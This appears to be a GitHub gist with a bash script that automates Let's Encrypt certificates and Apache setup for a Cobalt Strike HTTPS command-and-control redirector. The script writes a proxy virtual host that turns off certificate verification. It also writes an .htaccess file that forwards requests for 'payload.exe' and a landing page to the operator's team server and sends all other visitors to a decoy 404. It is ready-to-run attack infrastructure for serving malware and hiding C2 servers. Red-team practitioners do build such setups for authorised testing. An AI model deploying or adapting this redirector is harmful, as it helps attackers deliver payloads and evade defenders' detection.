Last active
May 15, 2022 01:01
-
-
Save sunnyneo/0f5953ca7555f1c8490b22ad718f332e to your computer and use it in GitHub Desktop.
Automate LetsEncrypt file and Apache configurations
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Refs: | |
# https://bluescreenofjeff.com/2018-04-12-https-payload-and-c2-redirectors/ | |
# https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh | |
# http://stackoverflow.com/questions/11617210/how-to-properly-import-a-selfsigned-certificate-into-java-keystore-that-is-avail | |
# https://www.digitalocean.com/community/tutorials/how-to-secure-apache-with-let-s-encrypt-on-ubuntu-14-04 | |
# http://www.advancedpentest.com/help-malleable-c2 | |
# https://maximilian-boehm.com/hp2121/Create-a-Java-Keystore-JKS-from-Let-s-Encrypt-Certificates.htm | |
# ./automate_letsencrypt.sh DOMAIN_NAME_TO_GENERATE_CERT IP_TO_BE_REDIRECTED TO | |
domain="$1" | |
teamserver_ip="$2" | |
func_install_letsencrypt(){ | |
sudo git clone https://github.com/certbot/certbot /opt/letsencrypt | |
cd /opt/letsencrypt | |
sudo ./letsencrypt-auto --apache -d $domain -d www.$domain -n --register-unsafely-without-email --agree-tos | |
} | |
func_create_virtualhost() { | |
cd ~ | |
cat > $domain-ssl.conf << EOF | |
<IfModule mod_ssl.c> | |
<VirtualHost _default_:443> | |
ServerAdmin webmaster@localhost | |
DocumentRoot /var/www/html | |
ServerAlias $domain www.$domain | |
SSLEngine on | |
# Enable Proxy | |
SSLProxyEngine On | |
# Trust Self-Signed Certificates generated by Cobalt Strike | |
SSLProxyVerify none | |
SSLProxyCheckPeerCN off | |
SSLProxyCheckPeerName off | |
SSLCertificateFile /etc/letsencrypt/live/$domain/cert.pem | |
SSLCertificateKeyFile /etc/letsencrypt/live/$domain/privkey.pem | |
<FilesMatch "\.(cgi|shtml|phtml|php)$"> | |
SSLOptions +StdEnvVars | |
</FilesMatch> | |
<Directory /usr/lib/cgi-bin> | |
SSLOptions +StdEnvVars | |
</Directory> | |
</VirtualHost> | |
</IfModule> | |
EOF | |
sudo cp /home/admin/$domain-ssl.conf /etc/apache2/sites-enabled/default-ssl.conf | |
} | |
func_create_htaccess() { | |
cd ~ | |
cat > .htaccess << EOF | |
RewriteEngine On | |
RewriteCond %{REQUEST_URI} ^/(payload\.exe|landingpage\.html)/?$ [NC] | |
RewriteRule ^.*$ http://$teamserver_ip%{REQUEST_URI} [P] | |
RewriteRule ^.*$ http://example.com/404? [L,R=302] | |
EOF | |
sudo cp .htaccess /var/www/html/.htaccess | |
} | |
# install letsencrypt cerbot | |
# enable .htacess | |
# create apache2 site.conf | |
# create .htaccess | |
sudo service apache2 start | |
func_install_letsencrypt | |
sudo sed -i '/<Directory \/var\/www\/>/,/<\/Directory>/ s/AllowOverride None/AllowOverride all/' /etc/apache2/apache2.conf | |
func_create_virtualhost | |
func_create_htaccess | |
sudo service apache2 restart |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment